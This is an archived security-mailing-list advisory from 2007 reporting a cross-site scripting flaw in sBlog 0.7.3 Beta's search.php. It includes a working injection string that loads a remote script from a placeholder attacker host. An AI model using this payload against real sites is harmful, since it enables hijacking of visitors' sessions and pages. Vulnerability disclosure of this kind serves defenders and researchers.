Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Metyus Forum Portal v1.0

  [Full-disclosure] WordPress wp-feedstats persistent XSS

  PHPSysInfo Index.php Cross Site Scripting

  SolpotCrew Advisory #14 (S4M3K) - PhpHostBot (login_form) Remote File Inclusion

From:Guns_(at)_0x90.com.ar <Guns_(at)_0x90.com.ar>
Date:27.07.2007
Subject:sBlog 0.7.3 Beta XSS Vulnerabilitie

# sBlog 0.7.3 Beta  XSS Vulnerabilitie
# Found by 0x90
# www.0x90.com.ar
# msn & mail: Guns@0x90.com.ar


# in blog
http://host/blog/search.php

# use

"/></><script src=http://yoursite.com/evil.js>

# Welcome to the jungle!

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server